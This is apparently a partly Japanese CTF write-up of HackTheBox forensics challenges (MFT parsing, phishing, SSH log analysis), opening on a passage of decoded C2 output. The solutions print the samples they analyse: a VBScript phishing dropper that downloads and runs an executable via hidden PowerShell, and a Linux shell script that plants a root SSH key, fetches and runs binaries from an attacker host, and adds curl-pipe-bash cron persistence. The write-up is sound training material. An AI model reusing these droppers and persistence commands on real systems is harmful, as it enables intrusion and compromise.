>> C:\Users\svc01\.ssh\authorized_keys cmd;C:\; cmd;C:\;dir C:\Users\svc01\Documents cmd;C:\; Volume in drive C is Windows 10 Volume Serial Number is B4A6-FEC6 Directory of C:\Users\svc01\Documents 02/28/2024 07:13 AM <DIR> . 02/28/2024 07:13 AM <DIR> .. 02/28/2024 05:14 AM 76 credentials.txt 1 File(s) 76 bytes 2 Dir(s) 24,147,230,720 bytes free cmd;C:\;type C:\Users\svc01\Documents\credentials.txt cmd;C:\;Username: svc01 Password: Passw0rdCorp5421 2nd flag part: _h45_b33n_r357 lsdrives lsdrives;C:\| lsfiles lsfiles-C:\ 入力は有効な Base-64 文字列ではありません。Base-64 以外の文字が含まれるか、3 個以上の埋め込み文字があるか、または埋め込 み文字の間に無効な文字が含まれます。 Cipher Text: YdPbtpi8M11upjnkrlr/y5tLDKdQBiPWbkgDSKmFCWusn5GFkosc8AYU2M7C1+xEHdMgJ3is+7WW099YpCIArFhDNKRZxAM9GPawxOMI+w3/oimWm9Y/7pjGbcpXcC+2X1MTla0M2nvzsIKPtGeSku4npe8pPGS+fbxwXOkZ5kfZgaN33Nn+jW61VP49dslxvH47v97udYEHm8IO+f7OhCfzetKiulh3PN4tlzIB5I+PBdtDbOXnxHj+ygGW25xjyNh1Fbm2kweHL+qlFmPPtyapWYZMd85tPmRYBwevpvu9LO2tElYAcmFJwG8xc9lc9ca03ha2rIh3ioSNws9grVwFW3SjdcyqoGhcN8cr0FPgu2Q0OVKMdYprjRdEEeptdcBMybcYhHs9jcNKZu0R/pgiSbCPuONN67uF2Jw/9Ss=YdPbtpi8M11upjnkrlr/y5tLDKdQBiPWbkgDSKmFCWusn5GFkosc8AYU2M7C1+xEHdMgJ3is+7WW099YpCIArFhDNKRZxAM9GPawxOMI+w3/oimWm9Y/7pjGbcpXcC+2X1MTla0M2nvzsIKPtGeSku4npe8pPGS+fbxwXOkZ5kfZgaN33Nn+jW61VP49dslxvH47v97udYEHm8IO+f7OhCfzetKiulh3PN4tlzIB5I+PBdtDbOXnxHj+ygGW25xjyNh1Fbm2kweHL+qlFmPPtyapWYZMd85tPmRYBwevpvu9LO2tElYAcmFJwG8xc9lc9ca03ha2rIh3ioSNws9grVwFW3SjdcyqoGhcN8cr0FPgu2Q0OVKMdYprjRdEEeptdcBMybcYhHs9jcNKZu0R/pgiSbCPuONN67uF2Jw/9Ss= error lsfiles-C:\temp\ lsfiles;C:\temp\;aQ4caZ.exeヲ1ヲ29184| upfile;C:\temp\4AcFrqA.ps1 入力データが完全なブロックではありません。 Cipher Text: AcABkAGEAdABlAHIALgBjAG8AbQAvADQAZgB2AGEALgBlAHgAZQAiACwAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIAKQAKAAoAJABhAGMAdABpAG8AbgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAHMAdgBjADAAMQBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwANABmAHYAYQAuAGUAeABlACIACgAKACQAdAByAGkAZwBnAGUAcgAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ARABhAGkAbAB5ACAALQBBAHQAIAAyADoAMAAwAEEATQAKAAoAJABzAGUAdAB0AGkAbgBnAHMAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAKAAoAIwAgADMAdABoACAAZgBsAGEAZwAgAHAAYQByAHQAOgAKAAoAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgAwAHIAMwBkAF8 error upfilestop; ~~~ ## Pursue The Tracks (Solved) > HTB{p4rs1ng_mft_1s_v3ry_1mp0rt4nt_s0m3t1m3s} ~~~ Files are related to two years, which are those? (for example: 1993,1995) > 2023,2024 [+] Correct! There are some documents, which is the name of the first file written? (for example: randomname.pdf) > Final_Annual_Report.xlsx [+] Correct! Which file was deleted? (for example: randomname.pdf) > Marketing_Plan.xlsx [+] Correct! How many of them have been set in Hidden mode? (for example: 43) > 1 [+] Correct! Which is the filename of the important TXT file that was created? (for example: randomname.txt) > credentials.txt [+] Correct! A file was also copied, which is the new filename? (for example: randomname.pdf) > Financial_Statement_draft.xlsx [+] Correct! Which file was modified after creation? (for example: randomname.pdf) > Project_Proposal.pdf [+] Correct! What is the name of the file located at record number 45? (for example: randomname.pdf) > Annual_Report.xlsx [+] Correct! What is the size of the file located at record number 40? (for example: 1337) > 57344 [+] Correct! [+] Here is the flag: HTB{p4rs1ng_mft_1s_v3ry_1mp0rt4nt_s0m3t1m3s} ~~~ ## Urgent (Solved) > HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT} * .eml ファイルが与えられる。 ![image](https://hackmd.io/_uploads/rkC6Vgqp6.png) * 添付ファイルを見てみると、javascript 内に URL エンコードされた文字列が見つかる ~~~ <html> <head> <title></title> <body> <script language="JavaScript" type="text/javascript"> document.write(unescape('%3c%68%74%6d%6c%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%74%69%74%6c%65%3e%20%3e%5f%20%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%63%65%6e%74%65%72%3e%3c%68%31%3e%34%30%34%20%4e%6f%74%20%46%6f%75%6e%64%3c%2f%68%31%3e%3c%2f%63%65%6e%74%65%72%3e%0d%0a%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%56%42%53%63%72%69%70%74%22%3e%0d%0a%53%75%62%20%77%69%6e%64%6f%77%5f%6f%6e%6c%6f%61%64%0d%0a%09%63%6f%6e%73%74%20%69%6d%70%65%72%73%6f%6e%61%74%69%6f%6e%20%3d%20%33%0d%0a%09%43%6f%6e%73%74%20%48%49%44%44%45%4e%5f%57%49%4e%44%4f%57%20%3d%20%31%32%0d%0a%09%53%65%74%20%4c%6f%63%61%74%6f%72%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%22%57%62%65%6d%53%63%72%69%70%74%69%6e%67%2e%53%57%62%65%6d%4c%6f%63%61%74%6f%72%22%29%0d%0a%09%53%65%74%20%53%65%72%76%69%63%65%20%3d%20%4c%6f%63%61%74%6f%72%2e%43%6f%6e%6e%65%63%74%53%65%72%76%65%72%28%29%0d%0a%09%53%65%72%76%69%63%65%2e%53%65%63%75%72%69%74%79%5f%2e%49%6d%70%65%72%73%6f%6e%61%74%69%6f%6e%4c%65%76%65%6c%3d%69%6d%70%65%72%73%6f%6e%61%74%69%6f%6e%0d%0a%09%53%65%74%20%6f%62%6a%53%74%61%72%74%75%70%20%3d%20%53%65%72%76%69%63%65%2e%47%65%74%28%22%57%69%6e%33%32%5f%50%72%6f%63%65%73%73%53%74%61%72%74%75%70%22%29%0d%0a%09%53%65%74%20%6f%62%6a%43%6f%6e%66%69%67%20%3d%20%6f%62%6a%53%74%61%72%74%75%70%2e%53%70%61%77%6e%49%6e%73%74%61%6e%63%65%5f%0d%0a%09%53%65%74%20%50%72%6f%63%65%73%73%20%3d%20%53%65%72%76%69%63%65%2e%47%65%74%28%22%57%69%6e%33%32%5f%50%72%6f%63%65%73%73%22%29%0d%0a%09%45%72%72%6f%72%20%3d%20%50%72%6f%63%65%73%73%2e%43%72%65%61%74%65%28%22%63%6d%64%2e%65%78%65%20%2f%63%20%70%6f%77%65%72%73%68%65%6c%6c%2e%65%78%65%20%2d%77%69%6e%64%6f%77%73%74%79%6c%65%20%68%69%64%64%65%6e%20%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%73%3a%2f%2f%73%74%61%6e%64%75%6e%69%74%65%64%2e%68%74%62%2f%6f%6e%6c%69%6e%65%2f%66%6f%72%6d%73%2f%66%6f%72%6d%31%2e%65%78%65%27%2c%27%25%61%70%70%64%61%74%61%25%5c%66%6f%72%6d%31%2e%65%78%65%27%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%27%25%61%70%70%64%61%74%61%25%5c%66%6f%72%6d%31%2e%65%78%65%27%3b%24%66%6c%61%67%3d%27%48%54%42%7b%34%6e%30%74%68%33%72%5f%64%34%79%5f%34%6e%30%74%68%33%72%5f%70%68%31%73%68%69%31%6e%67%5f%34%74%74%33%6d%70%54%7d%22%2c%20%6e%75%6c%6c%2c%20%6f%62%6a%43%6f%6e%66%69%67%2c%20%69%6e%74%50%72%6f%63%65%73%73%49%44%29%0d%0a%09%77%69%6e%64%6f%77%2e%63%6c%6f%73%65%28%29%0d%0a%65%6e%64%20%73%75%62%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%2f%68%74%6d%6c%3e%0d%0a')); </script> </body> </html> ~~~ * URLエンコードされた文字列をデコードすると、フラグが出てきた。 ~~~ ito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-urgent$ echo "%3c%68%74%6d%6c%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%74%69%74%6c%65%3e%20%3e%5f%20%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%63%65%6e%74%65%72%3e%3c%68%31%3e%34%30%34%20%4e%6f%74%20%46%6f%75%6e%64%3c%2f%68%31%3e%3c%2f%63%65%6e%74%65%72%3e%0d%0a%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%56%42%53%63%72%69%70%74%22%3e%0d%0a%53%75%62%20%77%69%6e%64%6f%77%5f%6f%6e%6c%6f%61%64%0d%0a%09%63%6f%6e%73%74%20%69%6d%70%65%72%73%6f%6e%61%74%69%6f%6e%20%3d%20%33%0d%0a%09%43%6f%6e%73%74%20%48%49%44%44%45%4e%5f%57%49%4e%44%4f%57%20%3d%20%31%32%0d%0a%09%53%65%74%20%4c%6f%63%61%74%6f%72%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%22%57%62%65%6d%53%63%72%69%70%74%69%6e%67%2e%53%57%62%65%6d%4c%6f%63%61%74%6f%72%22%29%0d%0a%09%53%65%74%20%53%65%72%76%69%63%65%20%3d%20%4c%6f%63%61%74%6f%72%2e%43%6f%6e%6e%65%63%74%53%65%72%76%65%72%28%29%0d%0a%09%53%65%72%76%69%63%65%2e%53%65%63%75%72%69%74%79%5f%2e%49%6d%70%65%72%73%6f%6e%61%74%69%6f%6e%4c%65%76%65%6c%3d%69%6d%70%65%72%73%6f%6e%61%74%69%6f%6e%0d%0a%09%53%65%74%20%6f%62%6a%53%74%61%72%74%75%70%20%3d%20%53%65%72%76%69%63%65%2e%47%65%74%28%22%57%69%6e%33%32%5f%50%72%6f%63%65%73%73%53%74%61%72%74%75%70%22%29%0d%0a%09%53%65%74%20%6f%62%6a%43%6f%6e%66%69%67%20%3d%20%6f%62%6a%53%74%61%72%74%75%70%2e%53%70%61%77%6e%49%6e%73%74%61%6e%63%65%5f%0d%0a%09%53%65%74%20%50%72%6f%63%65%73%73%20%3d%20%53%65%72%76%69%63%65%2e%47%65%74%28%22%57%69%6e%33%32%5f%50%72%6f%63%65%73%73%22%29%0d%0a%09%45%72%72%6f%72%20%3d%20%50%72%6f%63%65%73%73%2e%43%72%65%61%74%65%28%22%63%6d%64%2e%65%78%65%20%2f%63%20%70%6f%77%65%72%73%68%65%6c%6c%2e%65%78%65%20%2d%77%69%6e%64%6f%77%73%74%79%6c%65%20%68%69%64%64%65%6e%20%28%4e%65%77%2d%4f%62%6a%65%63%74%20%53%79%73%74%65%6d%2e%4e%65%74%2e%57%65%62%43%6c%69%65%6e%74%29%2e%44%6f%77%6e%6c%6f%61%64%46%69%6c%65%28%27%68%74%74%70%73%3a%2f%2f%73%74%61%6e%64%75%6e%69%74%65%64%2e%68%74%62%2f%6f%6e%6c%69%6e%65%2f%66%6f%72%6d%73%2f%66%6f%72%6d%31%2e%65%78%65%27%2c%27%25%61%70%70%64%61%74%61%25%5c%66%6f%72%6d%31%2e%65%78%65%27%29%3b%53%74%61%72%74%2d%50%72%6f%63%65%73%73%20%27%25%61%70%70%64%61%74%61%25%5c%66%6f%72%6d%31%2e%65%78%65%27%3b%24%66%6c%61%67%3d%27%48%54%42%7b%34%6e%30%74%68%33%72%5f%64%34%79%5f%34%6e%30%74%68%33%72%5f%70%68%31%73%68%69%31%6e%67%5f%34%74%74%33%6d%70%54%7d%22%2c%20%6e%75%6c%6c%2c%20%6f%62%6a%43%6f%6e%66%69%67%2c%20%69%6e%74%50%72%6f%63%65%73%73%49%44%29%0d%0a%09%77%69%6e%64%6f%77%2e%63%6c%6f%73%65%28%29%0d%0a%65%6e%64%20%73%75%62%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%2f%68%74%6d%6c%3e%0d%0a" | nkf --url-input <html> <head> <title> >_ </title> <center><h1>404 Not Found</h1></center> <script language="VBScript"> Sub window_onload const impersonation = 3 Const HIDDEN_WINDOW = 12 Set Locator = CreateObject("WbemScripting.SWbemLocator") Set Service = Locator.ConnectServer() Service.Security_.ImpersonationLevel=impersonation Set objStartup = Service.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ Set Process = Service.Get("Win32_Process") Error = Process.Create("cmd.exe /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://standunited.htb/online/forms/form1.exe','%appdata%\form1.exe');Start-Process '%appdata%\form1.exe';$flag='HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT}", null, objConfig, intProcessID) window.close() end sub </script> </head> </html> ~~~ ## An unusual sighting (solved) > HTB{B3sT_0f_luck_1n_th3_Fr4y!!} ~~~ What is the IP Address and Port of the SSH Server (IP:PORT) > 100.107.36.130:2221 [+] Correct! What time is the first successful Login > 2024-02-13 11:29:50 [+] Correct! What is the time of the unusual Login > 2024-02-19 04:00:14 [+] Correct! What is the Fingerprint of the attacker's public key > OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4 [+] Correct! What is the first command the attacker executed after logging in > whoami [+] Correct! What is the final command the attacker executed before logging out > ./setup [+] Correct! [+] Here is the flag: HTB{B3sT_0f_luck_1n_th3_Fr4y!!} ~~~ ## It Has Begun (Solved) > HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!} * シェルスクリプトが与えられる。 ~~~ #!/bin/sh if [ "$HOSTNAME" != "KORP-STATION-013" ]; then exit fi if [ "$EUID" -ne 0 ]; then exit fi docker kill $(docker ps -q) docker rm $(docker ps -a -q) echo "ssh-rsa AAAAB4NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D7s4J0L7XV2kep0rNzgY1S1IdE8HDAf7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B user@tS_u0y_ll1w{BTH" >> /root/.ssh/authorized_keys echo "nameserver 8.8.8.8" >> /etc/resolv.conf echo "PermitRootLogin yes" >> /etc/ssh/sshd_config echo "128.90.59.19 legions.korp.htb" >> /etc/hosts for filename in /proc/*; do ex=$(ls -latrh $filename 2> /dev/null|grep exe) if echo $ex |grep -q "/var/lib/postgresql/data/postgres\|atlas.x86\|dotsh\|/tmp/systemd-private-\|bin/sysinit\|.bin/xorg\|nine.x86\|data/pg_mem\|/var/lib/postgresql/data/.*/memory\|/var/tmp/.bin/systemd\|balder\|sys/systemd\|rtw88_pcied\|.bin/x\|httpd_watchdog\|/var/Sofia\|3caec218-ce42-42da-8f58-970b22d131e9\|/tmp/watchdog\|cpu_hu\|/tmp/Manager\|/tmp/manh\|/tmp/agettyd\|/var/tmp/java\|/var/lib/postgresql/data/pоstmaster\|/memfd\|/var/lib/postgresql/data/pgdata/pоstmaster\|/tmp/.metabase/metabasew"; then result=$(echo "$filename" | sed "s/\/proc\///") kill -9 $result echo found $filename $result fi done ARCH=$(uname -m) array=("x86" "x86_64" "mips" "aarch64" "arm") if [[ $(echo ${array[@]} | grep -o "$ARCH" | wc -w) -eq 0 ]]; then exit fi cd /tmp || cd /var/ || cd /mnt || cd /root || cd etc/init.d || cd /; wget http://legions.korp.htb/0xda4.0xda4.$ARCH; chmod 777 0xda4.0xda4.$ARCH; ./0xda4.0xda4.$ARCH; cd /tmp || cd /var/ || cd /mnt || cd /root || cd etc/init.d || cd /; tftp legions.korp.htb -c get 0xda4.0xda4.$ARCH; cat 0xda4.0xda4.$ARCH > DVRHelper; chmod +x *; ./DVRHelper $ARCH; cd /tmp || cd /var/ || cd /mnt || cd /root || cd etc/init.d || cd /; busybox wget http://legions.korp.htb/0xda4.0xda4.$ARCH; chmod 777;./0xda4.0xda4.$ARCH; echo "*/5 * * * * root curl -s http://legions.korp.htb/0xda4.0xda4.$ARCH | bash -c 'NG5kX3kwdVJfR3IwdU5kISF9' " >> /etc/crontab ~~~ * 14行目のSSHの鍵を書き込んでいるところで、ユーザー名にフラグの断片らしき文字列`tS_u0y_ll1w{BTH`がある。 * 逆順になっているようなので、ひっくり返す ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-it-has-begun$ echo "tS_u0y_ll1w{BTH" | rev HTB{w1ll_y0u_St ~~~ * 39行目の永続化のところに、謎の文字列`NG5kX3kwdVJfR3IwdU5kISF9`がある * base64 でエンコードされていそうなので、デコードする ~~~ mito@mito-Virtual-Machine:~/ctf/hackthebox-cyber-apocalypse-ctf-2024/forensics-it-has-begun$ echo "NG5kX3kwdVJfR3IwdU5kISF9" | base64 -d 4nd_y0uR_Gr0uNd!!} ~~~ * 得られた2つの文字列をくっつけて、フラグ完成。 ~~~